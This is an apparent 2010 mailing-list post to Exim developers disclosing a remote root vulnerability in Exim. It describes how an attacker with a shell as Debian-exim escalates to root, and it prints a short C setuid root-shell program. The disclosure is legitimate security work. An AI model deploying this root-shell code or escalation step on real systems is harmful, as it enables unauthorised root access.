Author: Sergey Kononenko

Date: 2010-12-07 21:59 UTC

To: exim-dev

CC: pkg-exim4-maintainers

Subject: [exim-dev] Remote root vulnerability in Exim



after that attacker gets shell with id of user Debian-exim and cwd in /var/spool/exim4 then it put file there file setuid with trivial execution of root shell: int main(int argc, char *argv[]) { setuid(0); setgid(0); setgroups(0, NULL); execl("/bin/sh", "sh", NULL); }